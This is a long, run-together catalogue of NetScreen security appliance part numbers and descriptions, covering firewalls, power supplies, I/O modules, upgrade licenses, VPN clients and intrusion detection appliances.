NetScreen-5XT Japanese Power cordNS-5XT-101NetScreen-5XT Elite (unrestricted user)NS-5XT-103NetScreen-5XT UK Power cord (unrestricted user)NS-5XT-105NetScreen-5XT Europe Power cord (unrestricted user)NS-5XT-107-NN NetScreen-5XT Japanese Power cord (unrestricted user)NS-HSC-001NetScreen-HSC 5-User with US power supply, 110V onlyNS-HSC-003NetScreen-HSC 5-User with UK power supplyNS-HSC-005NetScreen-HSC 5-User with European power supplyNS-HSC-007-NN NetScreen-HSC 5-User with Japan power supplyNS-HSC-101NetScreen-HSC Plus Unrestricted User with US power supply, 110V onlyNS-HSC-103NetScreen-HSC Plus Unrestricted User with UK power supplyNS-HSC-105NetScreen-HSC Plus Unrestricted User with European power supplyNS-HSC-107-NN NetScreen-HSC Plus Unrestricted User with Japan power supplyNS-HSC-PLU NetScreen-HSC upgrade from Basic to PlusNetScreen-5GT and Hardware Security Client with Embedded Antivirus Applianc NetScreen 5 and Other General Appliance Components and UpgradesNS-5GT-PLU NetScreen-5GT and NetScreen-Hardware Security Client Upgrade to Plus(Unrestricted User)NS-5GT-EPU NetScreen-5GT Extended upgrade from NetScreen-5GT PlusNS-5GT-ETU NetScreen-5GT Extended upgrade from NetScreen-5GT 10 UserNS-5XP-ELU NetScreen-5XP Upgrade from 10 Users to EliteNS-5XT-ELU NetScreen-5XT Upgrade from 10 Users to EliteNS-5GT-RMK NetScreen-5GT Rack Mount Kit - holds 2 unitsNS-5GT-PWR-L-EURNetScreen-5GT Switching Power Supply, European Power CableNS-5GT-PWR-L-J-NN NetScreen-5GT Switching Power Supply, Japan Power CableNS-5GT-PWR-L-UK NetScreen-5GT Switching Power Supply, UK Power CableNS-5GT-PWR-L-US NetScreen-5GT Switching Power Supply, US Power CableNS-5GT-PWR-S-US NetScreen-5GT Switching Power Supply, US Power CableNS-5XT-RMK NetScreen-5XT Rack Mount Kit - holds 2 unitsNS-5XT-PWR-NN NetScreen-5XT Power Supply, Japanese Power CableNS-S94-016NetScreen-5XT US Power Cable (includes Power Supply)NS-S94-017NetScreen-5XT UK Power Cable (includes Power Supply)NS-S94-018NetScreen-5XT Europe Power Cable (includes Power Supply)NS-S94-001Straight Through Cable (5-pack) for NetScreen Security ApplianceNS-S94-002Crossover Cable (5-pack) NetScreen Security ApplianceNS-S94-004Console Cable for NetScreen-5XP, NetScreen-5GT and NetScreen-5XTNS-S94-005US Power Cable for NetScreen appliancesNS-S94-01010 pack of UK Power Cables for NetScreen appliancesNS-S94-01110 pack of Europe Power Cables for NetScreen appliancesNS-S94-01210 pack of Japan Power Cables for NetScreen appliancesNS-S97-001NS10/100/25/50/204/208 (5-pack, shipping boxes and foam/inserts)NS-S97-003NS-500 (5-pack, shipping boxes and foam/inserts)NS-S97-005NS-5XT (5-pack, shipping boxes and foam/inserts)NS-S97-006NS-5GT (5-pack, shipping boxes and foam/inserts)NS-S97-007NS-IDP (5-pack, shipping boxes and foam/inserts)NS-S97-008NS-5200 (2-pack, shipping boxes and foam/inserts)NS-S97-009NS-5400 (1-pack, shipping box and foam/insert)NS-S97-010NS-500 I/O cards (5-pack, shipping boxes and foam/inserts)NS-S97-011NS-ISG-1000 (2-pack, shipping boxes and foam/inserts)NS-S97-012NS-ISG-2000 (2-pack, shipping boxes and foam/inserts)NetScreen 5GT Wireless ProductsNS-5GT-021NS-5GT Wireless 802.11g, 10-User, US Power Cord, US OnlyNS-5GT-023NS-5GT Wireless 802.11g, 10-User, UK Power Cord, WorldNS-5GT-025NS-5GT Wireless 802.11g, 10-User, EUR Power Cord, WorldNS-5GT-027-NN NS-5GT Wireless 802.11g, 10-User, JapanNS-5GT-028NS-5GT Wireless 802.11g, 10 User, US Power Cord, WorldNS-5GT-031-A NS-5GT Wireless 802.11g, ADSL Annex A, 10 User, US Power Cord, USOnlyNS-5GT-033-A NS-5GT Wireless 802.11g, ADSL Annex A, 10 User, UK Power Cord, World NS-5GT-035-A NS-5GT Wireless 802.11g, ADSL Annex A, 10 User, European Power Cord,WorldNS-5GT-038-A NS-5GT Wireless 802.11g, ADSL Annex A, 10 User, US Power Cord, World NS-5GT-033-B NS-5GT Wireless 802.11g, ADSL Annex B, 10 User, UK Power Cord, World NS-5GT-035-B NS-5GT Wireless 802.11g, ADSL Annex B, 10 User, European Power Cord,WorldNS-5GT-038-B NS-5GT Wireless 802.11g, ADSL Annex B, 10 User, US Power Cord, World NS-5GT-121NS-5GT Wireless 802.11g, Plus, US Power Cord, US OnlyNS-5GT-123NS-5GT Wireless 802.11g, Plus, UK Power Cord, WorldNS-5GT-125NS-5GT Wireless 802.11g, Plus, EUR Power Cord, WorldNS-5GT-127-NN NS-5GT Wireless 802.11g, Plus, JapanNS-5GT-128NS-5GT Wireless 802.11g, Plus, US Power Cord, WorldNS-5GT-131-A NS-5GT Wireless 802.11g, ADSL Annex A, Plus, US Power Cord, US OnlyNS-5GT-133-A NS-5GT Wireless 802.11g, ADSL Annex A, Plus, UK Power Cord, World NS-5GT-135-A NS-5GT Wireless 802.11g, ADSL Annex A, Plus, European Power Cord,WorldNS-5GT-138-A NS-5GT Wireless 802.11g, ADSL Annex A, Plus, US Power Cord, World NS-5GT-133-B NS-5GT Wireless 802.11g, ADSL Annex B, Plus, UK Power Cord, World NS-5GT-135-B NS-5GT Wireless 802.11g, ADSL Annex B, Plus, European Power Cord,WorldNS-5GT-138-B NS-5GT Wireless 802.11g, ADSL Annex B, Plus, US Power Cord, World NS-5GT-221NS-5GT Wireless 802.11g, Extended, US Power Cord, US OnlyNS-5GT-223NS-5GT Wireless 802.11g, Extended, UK Power Cord, WorldNS-5GT-225NS-5GT Wireless 802.11g, Extended, EUR Power Cord, WorldNS-5GT-227-NN NS-5GT Wireless 802.11g, Extended, JapanNS-5GT-228NS-5GT Wireless 802.11g, Extended, US Power Cord, WorldNS-5GT-231-A NS-5GT Wireless 802.11g, ADSL Annex A, Extended, US Power Cord, US OnlyNS-5GT-233-A NS-5GT Wireless 802.11g, ADSL Annex A, Extended, UK Power Cord,WorldNS-5GT-233-B NS-5GT Wireless 802.11g, ADSL Annex B, Extended, UK Power Cord,WorldNS-5GT-235-A NS-5GT Wireless 802.11g, ADSL Annex A, Extended, European PowerCord, WorldNS-5GT-235-B NS-5GT Wireless 802.11g, ADSL Annex B, Extended, European PowerCord, WorldNS-5GT-238-A NS-5GT Wireless 802.11g, ADSL Annex A, Extended, US Power Cord,WorldNS-5GT-238-B NS-5GT Wireless 802.11g, ADSL Annex B, Extended, US Power Cord,WorldNetScreen-5GT Wireless with Embedded Antivirus Appliance Products NetScreen 5GT Wireless ComponentsNS-5GT-RMK2NS-5GT Rack Mount Kit for ADSL and Wireless ProductsNS-5GT-ANT-24NS-5GT Wireless 2.4 GHz, Replacement AntennaNS-5GT-DHGA-24NS-5GT 2.4 GHz, Directional AntennaNS-5GT-OHGA-24NS-5GT 2.4 GHz, Omnidirectional AntennaNetScreen 25 - 208 Advanced Appliance ProductsNS-025-001NetScreen-25 with US Power CordNS-025-003NetScreen-25 with UK Power CordNS-025-005NetScreen-25 with Europe Power CordNS-025-007NetScreen-25 with Japan Power CordNS-050-001NetScreen-50 with US Power CordNS-050-001-DC NetScreen-50 with DC powerNS-050-003NetScreen-50 with UK Power CordNS-050-005NetScreen-50 with Europe Power CordNS-050-007NetScreen-50 with Japan Power CordNS-050-101NetScreen-50f, (without VPN) US Power CordNS-050-103NetScreen-50f, (without VPN) UK Power CordNS-050-105NetScreen-50f, (without VPN) Europe Power CordNS-050-107NetScreen-50f, (without VPN) Japan Power CordNS-204-001NetScreen-204, AC power, US Power cordNS-204-001-DC NetScreen-204, DC powerNS-204-003NetScreen-204, AC power, UK Power cordNS-204-005NetScreen-204, AC power, Europe Power cordNS-204-007NetScreen-204, AC power, Japan Power cordNS-204-101NetScreen-204, firewall-only, AC power, US Power cordNS-204-103NetScreen-204, firewall-only, AC power, UK Power cordNS-204-105NetScreen-204, firewall-only, AC power, Europe Power cordNS-204-107NetScreen-204, firewall-only, AC power, Japan Power cordNS-208-001NetScreen-208, AC power, US Power cordNS-208-001-DC NetScreen-208, DC powerNS-208-003NetScreen-208, AC power, UK Power cordNS-208-005NetScreen-208, AC power, Europe Power cordNS-025B-001NS-025B-003NetScreen-25 Baseline with UK Power CordNS-025B-005NetScreen-25 Baseline with European Power CordNS-025B-007NetScreen-25 Baseline with Japanese Power CordNS-050B-001NetScreen-50 Baseline with US Power CordNS-050B-003NetScreen-50 Baseline with UK Power CordNS-050B-005NetScreen-50 Baseline with European Power CordNS-050B-007NetScreen-50 Baseline with Japanese Power CordNS-204B-001NetScreen-204 Baseline, AC power, US Power cordNS-204B-003NetScreen-204 Baseline, AC power, UK Power cordNS-204B-005NetScreen-204 Baseline, AC power, European Power cordNS-204B-007NetScreen-204 Baseline, AC power, Japanese Power cordNS-208B-001NetScreen-208 Baseline, AC power, US Power cordNS-208B-001-DC NetScreen-208 Baseline, DC power, US Power cordNS-208B-003NetScreen-208 Baseline, AC power, UK Power cordNS-208B-005NetScreen-208 Baseline, AC power, European Power cordNS-200-RCK-02NetScreen-200 Rack Mount Kit (23" for NS-25/50/204/208)NS-S94-003Console Cable for NetScreen 10 or NetScreen 100NS-S94-014Console Cable for NetScreen-25/50/200/5000NS-S95-001NetScreen-10/100/ Rack Mount KitNS-200-VIRT Virtualization Key for NS-200 Appliance (Requires ScreenOS 4.0.2 or later;Additive: 96 VLANs, 10 Zones, 5 VRs)NS-025-UPG-A NetScreen-25 Baseline to Advanced Upgrade LicenseNS-050-UPG-A NetScreen-50 Baseline to Advanced Upgrade LicenseNS-204-UPG-A NetScreen-204 Baseline to Advanced Upgrade LicenseNS-208-UPG-A NetScreen-208 Baseline to Advanced Upgrade LicenseSSG 500 Series Base SystemsSSG-520B-001SSG 520 System, 256 MB DRAM, AC PowerSSG-520-001SSG 520 System, 1GB DRAM, AC PowerSSG-550B-001SSG 550 System, 256 MB DRAM, 1 AC Power supplySSG-550-001SSG 550 System, 1GB DRAM, 1 AC Power SupplySSG-520-001-DC SSG 520 System, 1GB DRAM, DC PowerSSG-550-001-DC SSG 550 System, 1GB DRAM, 1 DC Power SupplySSG-550-001-NEBS SSG 550 System, 1GB DRAM 1 AC Power Supply, NEBS CompliantJXE-1GE-SFP-S 1 Port Fiber Gigabit Ethernet Enhanced PIM, SFP sold separately - Spare. JXE-4FE-TX-S 4 Port Fast Ethernet Enhanced PIM - SpareJX-2T1-RJ48-S 2 Port T1 PIM with integrated CSU/DSU - SpareJX-2E1-RJ48-S 2 Port E1 PIM with integrated CSU/DSU - SpareJX-2Serial-S 2 Port Serial PIM - SpareJX-SFP-1GE-LX SFP 1000Base-LX Gigabit Optical Module for JXE-1GE-SFP-SJX-SFP-1GE-SX SFP 1000Base-SX Gigabit Optical Module for JXE-1GE-SFP-SJX-1DS3-S1xDS3 PIC - SpareSSG 500 Series AccessoriesSSG-PS-AC Spare Power Supply for SSG 550, AC PowerSSG-PS-DC Spare Power Supply for SSG 550, DC PowerSSG-500-MEM-1GB 1 Gigabyte DRAM Upgrade for the SSG 500 seriesSSG-500-FLTR Replacement air filter for SSG 550NetScreen-500 SystemsNS-500ES-FE1-AC NetScreen-500ES System, 3 Dual-Port 10/100 I/O Modules, 2 AC PowerSupplies, 0 Virtual SystemsNS-500ES-FE1-DC NetScreen-500ES System, 3 Dual-Port 10/100 I/O Modules, 2 DC PowerSupplies, 0 Virtual SystemsNS-500ES-FE2-AC NetScreen-500ES System, 2 Dual-Port 10/100 I/O Modules, 1 AC PowerSupplies, 0 Virtual SystemsNS-500ES-FE2-DC NetScreen-500ES System, 2 Dual-Port 10/100 I/O Modules, 1 DC PowerSupplies, 0 Virtual SystemsNS-500ES-GB1-AC NetScreen-500ES System, 2 GBIC SX I/O modules, 2 AC power supplies, 0 Virtual SystemsNS-500ES-GB1-DC NetScreen-500ES System, 2 GBIC SX I/O modules, 2 DC power supplies, 0 Virtual SystemsNS-500ES-GB2-AC NetScreen-500ES System, 2 Dual-Port mini-GBIC SX I/O modules, 2 ACpower supplies, 0 Virtual SystemsNS-500ES-GB2-DC NetScreen-500ES System, 2 Dual-Port mini-GBIC SX I/O modules, 2 DCpower supplies, 0 Virtual SystemsNS-500SP-GB1-AC NetScreen-500SP System, 2 GBIC SX I/O modules, 2 AC power supplies,25 Virtual SystemsNS-500SP-GB1-DC NetScreen-500SP System, 2 GBIC SX I/O modules, 2 DC power supplies,25 Virtual SystemsNS-500SP-GB2-AC NetScreen-500SP System, 2 Dual-Port mini-GBIC SX I/O modules, 2 ACpower supplies, 25 Virtual SystemsNS-500SP-GB2-DC NetScreen-500SP System, 2 Dual-Port mini-GBIC SX I/O modules, 2 DCpower supplies, 25 Virtual SystemsNS-500-SK1NetScreen-500a Chassis Starter Kit, base system, fan module, ScreenOS (no power supply, no I/O cards)NS-500-SK1-GPRS NetScreen-500 Chassis Starter Kit, base system, fan module, ScreenOS (no power supply, no I/O cards) with GPRS 5.0 bundledNS-500B-FE2NetScreen-500 Baseline System, 2 Dual-Port 10/100 I/O Modules, 1 ACPower Supply, 0 Virtual SystemsNS-500B-SK1NetScreen-500 Baseline Chassis Starter Kit, base system, fan module,ScreenOS (no power supply, no I/O cards)NS-500B-GB1NetScreen-500 Baseline System, 2 GBIC SX I/O Modules, 1 AC PowerSupply, 0 Virtual SystemsNetScreen-500 ComponentsNS-500-UPG-A NetScreen-500 Baseline to Advanced Upgrade LicenseNS-500-CBL-01NetScreen-500/5000 Cable, Fiber Optic, mini-GBIC (LC/SC Duplex, 3m) NS-500-CBL-02NetScreen-500 Cable, Fiber Optic, GBIC (SC/SC, 2M Duplex Multimode) NS-500-CBL-03NetScreen-500 Console CableNS-500-FAN NetScreen-500 Fan ModuleNS-500-FT-01NetScreen-500 Kit, Pack of Four Rubber FeetNS-500-HF2NetScreen-500 I/O Module - dual-port 10/100 Fast EthernetNS-500-HG1-LX NetScreen-500 I/O Module - GBIC-LX (GBIC Gigabit Ethernet, LXTransceiver, Single Port)NS-500-HG1-SX NetScreen-500 I/O Module - GBIC-SX (GBIC Gigabit Ethernet, SXTransceiver, Single Port)NS-500-HG2-LX NetScreen-500 I/O Module - Dual Port Mini GBIC-LX (Mini GBIC GigabitEthernet, LX Transceiver, Dual Port)NS-500-HG2-SX NetScreen-500 I/O Module - Dual Port Mini GBIC-SX (Mini GBIC GigabitEthernet, SX Transceiver, Dual Port)NS-500-HLX NetScreen-500/1000 - GBIC Transceiver - LXNS-500-HSX NetScreen-500/1000 - GBIC Transceiver - SXNS-500-PAN-01NetScreen-500 Blank Interface PanelNS-500-PAN-02NetScreen-500 Blank Power Supply CoverNS-500-PCK-01NetScreen-500 Accessory Pack (includes cables, docs, CD)NS-500-PWR-AC NetScreen-500 AC Power SupplyNS-500-PWR-DC NetScreen-500 DC Power SupplyNS-500-RCK-01NetScreen-500 Rack Mount Kit (19 in., all mounting hardware)NS-500-RCK-02NetScreen-500 Rack Mount Kit (23 in., all mounting hardware)NS-500-GPRS-5.0GPRS upgrade license for NS500 systemsNS-500-VSYS0 to 25 NetScreen-500 Virtual Systems UpgradeNS-500-VSYS-50 to 5 NetScreen-500 Virtual System UpgradeNS-500-VSYS-10 5 to 10 NetScreen-500 Virtual System UpgradeNS-500-VSYS-2510 to 25 NetScreen-500 Virtual Systems UpgradeNetScreen-1000 ComponentsNS-1KA-VSYS-25NetScreen-1000ES Virtual System Upgrade 5 to 25NS-1KA-VSYS-50NetScreen-1000ES Virtual System Upgrade 25 to 50NS-1KA-VSYS-100NetScreen-1000ES Virtual System Upgrade 50 to 100NS-1KA-VSYS-250NetScreen-1000 Virtual System Upgrade 100 to 250NetScreen-ISG Systems - Add I/O to build complete systems (Applies to ISG2000) NS-ISG-1000NS-ISG 1000 Advanced System, 4-10/100/1000 ports, Fan Tray, 0 I/O modules NS-ISG-1000-DC NS-ISG 1000 Advanced System, 4-10/100/1000 ports, Fan Tray, 0 I/O modules NS-ISG-1000B NS-ISG 1000 Baseline System, 4-10/100/1000 ports, Fan Tray, 0 I/O modules, A NS-ISG-1000B-DC NS-ISG 1000 Baseline System, 4-10/100/1000 ports, Fan Tray, 0 I/O modules, D NS-ISG-2000NetScreen-ISG 2000 Chassis, Advanced System, fan module, Dual ACPower Supplies, No I/O Modules, ScreenOS, 0 VSYSNS-ISG-2000-DC NetScreen-ISG 2000 Chassis, Advanced System, fan module, Dual DCPower Supplies, No I/O Modules, ScreenOS, 0 VSYSNS-ISG-2000B NetScreen-ISG 2000 Chassis, Baseline System, fan module, Dual ACPower Supplies, No I/O Modules, ScreenOS, 0 VSYSNS-ISG-2000B-DC NetScreen-ISG 2000 Chassis, Baseline System, fan module, Dual DCPower Supplies, No I/O Modules, ScreenOS, 0 VSYSNetScreen-ISG Components - Needed to build complete systemNS-ISG-SX2NetScreen-ISG I/O Module - Dual Port Mini GBIC-SX (SX Transceiversincluded), Light Grey Overlay, ISG 1000 & ISG 2000NS-ISG-LX2NetScreen-ISG I/O Module - Dual Port Mini GBIC-LX (LX Transceiversincluded), Light Grey Overlay, ISG 1000 & ISG 2000NS-ISG-TX2NetScreen-ISG I/O Module - Dual Port 10/100/1000 Gigabit Copper, LightGrey Overlay, ISG 1000 & ISG 2000NS-ISG-FE4NetScreen-ISG I/O Module - 4 Port 10/100 Fast Ethernet, Light GreyOverlay, ISG 1000 & ISG 2000NS-ISG-FE8NetScreen-ISG I/O Module - 8 Port 10/100 Fast Ethernet, Light GreyOverlay, ISG 1000 & ISG 2000NS-ISG-SEC ISG Security Module for ISG 1000 & ISG 2000NS-ISG-1000-IKT IDP Upgrade Kit for ISG 1000. One required per system. Includes 2GB memoryupgrade for system, IDP license, anti-static mat, screwdriver, and instructions.Includes 5 device NSM license.NS-ISG-2000-IKT IDP Upgrade Kit for ISG 2000. One required per system. Includes 2GBmemory upgrade for system, IDP license, anti-static mat, screwdriver, andinstructions. Includes 5 device NSM license.NetScreen-ISG Options - Software UpgradesNS-ISG-1000-VSYS-50 to 5 NS-ISG 1000 Virtual System UpgradeNS-ISG-1000-VSYS-105 to 10 NS-ISG 1000 Virtual System UpgradeNS-ISG-1000-UPG-A NS-ISG 1000 Upgrade Baseline to AdvancedNS-ISG-2000-VSYS-50 to 5 NetScreen-ISG 2000 Virtual System UpgradeNS-ISG-2000-VSYS-255 to 25 NetScreen-ISG 2000 Virtual System UpgradeNS-ISG-2000-VSYS-5025 to 50 NetScreen-ISG 2000 Virtual Systems UpgradeNS-ISG-2000-VSYS-0250 to 25 NetScreen-ISG 2000 Virtual Systems UpgradeNS-ISG-2000-VSYS-0500 to 50 NetScreen-ISG 2000 Virtual Systems UpgradeNS-ISG-2000-UPG-A NetScreen-ISG 2000 Upgrade Baseline to AdvancedNetScreen-ISG Spares - Not needed to build complete systemsNS-ISG-2000-TX2NetScreen-ISG 2000 I/O Module - Dual Port 10/100/1000 Gigabit Copper, Blue Overlay for Blue ISG 2000NS-ISG-2000-SX2NetScreen-ISG 2000 I/O Module - Dual Port Mini GBIC-SX (SXTransceivers included), Blue Overlay for Blue ISG 2000NS-ISG-2000-LX2NetScreen-ISG 2000 I/O Module - Dual Port Mini GBIC-LX (LX Transceivers included), Blue Overlay for Blue ISG 2000NS-ISG-2000-FE4NetScreen-ISG 2000 I/O Module - 4 Port 10/100 Fast Ethernet, BlueOverlay for Blue ISG 2000NS-ISG-2000-FE8NetScreen-ISG 2000 I/O Module - 8 Port 10/100 Fast Ethernet, BlueOverlay for Blue ISG 2000NS-ISG-1000-PWR-ACNS-ISG 1000 AC Power SupplyNS-ISG-1000-PWR-DCNS-ISG 1000 DC Power SupplyNS-ISG-2000-PWR-ACNetScreen-ISG 2000 AC Power Supply, Blue, for Blue ISG 2000NS-ISG-2000-PWR-DCNetScreen-ISG 2000 DC Power Supply, Blue, for Blue ISG 2000NS-ISG-2000-PWR-AC2NetScreen-ISG 2000 AC Power Supply, Dark GreyNS-ISG-2000-PWR-DC2NetScreen-ISG 2000 DC Power Supply, Dark GreyNS-ISG-FAN NetScreen-ISG Fan Module, for dark grey chassis, ISG 1000 & ISG 2000NS-ISG-2000-FAN NetScreen-ISG 2000 Fan Module, Blue, for Blue ISG 2000NS-ISG-2000-PPAN NetScreen-ISG 2000 Blank Power Supply Cover, Blue, for Blue ISG 2000NS-ISG-2000-PPAN2NetScreen-ISG 2000 Blank Power Supply Cover, Dark GreyNS-ISG-2000-RCK-01NetScreen ISG Rack Mount Kit (19 in., all mounting hardware)NS-ISG-2000-RCK-02NetScreen ISG Rack Mount Kit (23 in., all mounting hardware)NS-ISG-2000-IPAN NetScreen-ISG 2000 Blank I/O Interface Panel, Blue, for Blue ISG 2000NS-ISG-IPAN NetScreen-ISG Blank I/O Interface Panel, dark grey chassis, ISG 1000 &ISG 2000NS-ISG-2000-SK1NetScreen-ISG 2000 Chassis Starter Kit, Advanced System, fan module, NoPower Supplies, No I/O Modules, ScreenOSNS-ISG-2000B-SK1NetScreen-ISG 2000 Chassis Starter Kit, Baseline System, fan module, NoPower Supplies, No I/O Modules, ScreenOSNS-ISG-2000-GKT GPRS upgrade kit for NetScreen-ISG 2000 systemsNetScreen-5000 Systems - Add MGT or MGT2 and SPM Modules to build comple NS-5200NS-5200 System, No SPM or MGT modules, includes Fan Tray, Dual AC powersupply, 19" Rack Mount, 0 VSYSNS-5200-DC NS-5200 System, No SPM or MGT modules, includes Fan Tray, Dual DC powersupply, 19" Rack Mount, 0 VSYSNS-5400NS-5400 System, No SPM or MGT modules, includes Fan Tray, 3 x AC powersupply, 19" Rack Mount, 0 VSYSNS-5400-DC NS-5400 System, No SPM or MGT modules, includes Fan Tray, 3 x DC powersupply, 19" Rack Mount, 0 VSYSNetScreen-5000 Components - Needed to build complete systemsNS-5000-8G2NetScreen 5000 8 GigE Secure Port Module 2 (SPM)NS-5000-2XGE NetScreen 5000 2 10GigE Secure Port Module 2 (SPM) without transceiversNS-SYS-GBIC-MXSR Transceiver, XFP, 300m 10 Gig, Short Reach, Multi-modeNS-SYS-GBIC-MXLRTransceiver, XFP, 10km 10 Gig, Long Reach, Single-modeNS-5000-MGT NetScreen 5000 Management ModuleNS-5000-MGT2NetScreen 5000 Management Module 2NS-5000-2G24T NetScreen 5000 2 GigE 24 10/100 Secure Port Module (SPM)NS-5000-8G NetScreen 5000 8 GigE Secure Port Module (SPM)NetScreen-5000 Options - Software UpgradesNS-5000-VSYS-5NetScreen-5000 Virtual System Upgrade 0 to 5NS-5000-VSYS-25NetScreen-5000 Virtual System Upgrade 5 to 25NS-5000-VSYS-50NetScreen-5000 Virtual System Upgrade 25 to 50NS-5000-VSYS-100NetScreen-5000 Virtual System Upgrade 50 to 100NS-5000-VSYS-250NetScreen-5000 Virtual System Upgrade 100 to 250NS-5000-VSYS-500NetScreen-5000 Virtual System Upgrade 250 to 500NS-5000-VSYS NetScreen-5000 Virtual System Upgrade 0 to 500NetScreen-5000 Spares - Not needed to build complete systemsNS-5200-CHA NetScreen-5200 ChassisNS-5200-FAN NetScreen-5200 Fan AssemblyNS-5200-PWR-AC NetScreen-5200 AC Power SupplyNS-5200-PWR-DC NetScreen-5200 DC Power SupplyNS-5200-RCK-01NetScreen-5200 Rack Mount Kit (19 in., all mounting hardware)NS-5200-RCK-02NetScreen-5200 Rack Mount Kit (23 in., all mounting hardware)NS-5400-CHA NetScreen-5400 ChassisNS-5400-FAN NetScreen-5400 Fan AssemblyNS-5400-PWR-AC NetScreen-5400 AC Power SupplyNS-5400-PWR-DC NetScreen-5400 DC Power SupplyNS-5400-RCK-01NetScreen-5400 Rack Mount Kit (19 in., all mounting hardware)NS-5400-RCK-02NetScreen-5400 Rack Mount Kit (23 in., all mounting hardware)NS-SYS-GBIC-MLX Mini-GBIC Transceiver (LX) for NetScreen-500/5000, ISG 1000/2000NS-SYS-GBIC-MSX Mini-GBIC Transceiver (SX) for NetScreen-500/5000, ISG 1000/2000NS-SYS-GBIC-MTX Mini-GBIC Transceiver 1000Base-T Gigabit Ethernet (uses Cat 5 cable)NS-500-CBL-01NetScreen-500/5000 Cable, Fiber Optic, mini-GBIC (LC/SC Duplex, 3m)NS-5000-FT-01NS-5400, NS-5200 Kit, Rubber FeetNetScreen Security Manager Product LineNS-SM-10NetScreen-Security Manager license for up to 10 devicesNS-SM-25NetScreen-Security Manager license for up to 25 devicesNS-SM-50NetScreen-Security Manager license for up to 50 devicesNS-SM-100NetScreen-Security Manager license for up to 100 devicesNS-SM-200NetScreen-Security Manager license for up to 200 devicesNS-SM-500NetScreen-Security Manager license for up to 500 devicesNS-SM-1000NetScreen-Security Manager license for up to 1000 devicesNS-SM-SRS Statistical Report Server add-on module for NetScreen-Security Manager NS-SM-UP-10NetScreen-Security Manager license for upgrade from NS-SM-5 to NS-SM-10NS-SM-UP-25NetScreen-Security Manager license for upgrade from NS-SM-10 to NS-SM-25NS-SM-UP-50NetScreen-Security Manager license for upgrade from NS-SM-25 to NS-SM-50NS-SM-UP-100NetScreen-Security Manager license for upgrade from NS-SM-50 to NS-SM-100NS-SM-UP-200NetScreen-Security Manager license for upgrade from NS-SM-100 to NS-SM-200NS-SM-UP-500NetScreen-Security Manager license for upgrade from NS-SM-200 to NS-SM-500NS-SM-UP-1000NetScreen-Security Manager license for upgrade from NS-SM-500 to NS-SM-1000NS-SM-ADD-1000Additional increments of 1000 devices for NS-SM-1000NS-GPX-SM-UP25Upgrade Global PRO Express for 25 devices to Security ManagerNS-GPX-SM-UP100Upgrade Global PRO Express for 100 devices to Security ManagerNS-GPX-SM-UP200Upgrade Global PRO Express for 200 devices to Security ManagerNS-GP-SM-UP25Upgrade Global PRO for 25 devices to Security ManagerNS-GP-SM-UP100Upgrade Global PRO for 100 devices to Security ManagerNS-GP-SM-UP200Upgrade Global PRO for 200 devices to Security ManagerNS-GP-SM-UP500Upgrade Global PRO for 500 devices to Security ManagerNS-GP-SM-UP1000Upgrade Global PRO for 1000 devices to Security ManagerNetScreen-Global PRO Product LineNS-PRO-IDP-UP75NetScreen-IDP Management Software license for upgrade from NS-PRO-IDP-25 to NS-PRO-IDP-100NetScreen Remote VPN client - 3DES VersionNS-R8A-010NetScreen-Remote VPN Client 8 for Windows 95/98/ME/NT/2000/XP, 10user licenseNS-R8A-100NetScreen-Remote VPN Client 8 for Windows 95/98/ME/NT/2000/XP, 100 user licenseNS-R8A-110NetScreen-Remote VPN Client 8 for Windows 95/98/ME/NT/2000/XP, 1000 user licenseNetScreen Remote Security Client - 3DES VersionNS-R8P-010NetScreen-Remote Security Client 8 for Windows 95/98/ME/NT/2000/XP, 10 user licenseNS-R8P-100NetScreen-Remote Security Client 8 for Windows 95/98/ME/NT/2000/XP,100 user licenseNS-R8P-110NetScreen-Remote Security Client 8 for Windows 95/98/ME/NT/2000/XP,1000 user licenseNetScreen-IDP Intrusion Detection and Prevention ProductsNS-IDP-50IDP 50 Intrusion Detection and Prevention ApplianceNS-IDP-200IDP 200 Intrusion Detection and Prevention ApplianceNS-IDP-600C IDP 600C Intrusion Detection and Prevention ApplianceNS-IDP-600F IDP 600F Intrusion Detection and Prevention ApplianceNS-IDP-1100C IDP 1100C Intrusion Detection and Prevention ApplianceNS-IDP-1100F IDP 1100F Intrusion Detection and Prevention ApplianceNS-IDP-10-003NetScreen-IDP 10 Intrusion Detection and Prevention ApplianceNS-IDP-100-002NetScreen-IDP 100 Intrusion Detection and Prevention ApplianceNS-IDP-500-002NetScreen-IDP 500 Intrusion Detection and Prevention Appliance (Includes dual on-board copper gig ports)NS-IDP-1000NetScreen-IDP 1000 Intrusion Detection and Prevention Appliance(Includes dual on-board copper gig ports)NS-IDP-BYP NetScreen-IDP Bypass for IDP 10 and IDP 100 AppliancesNS-IDP-BYP-NN NetScreen-IDP Bypass for IDP 10 and IDP 100 Appliances, Japan NetScreen-IDP Components。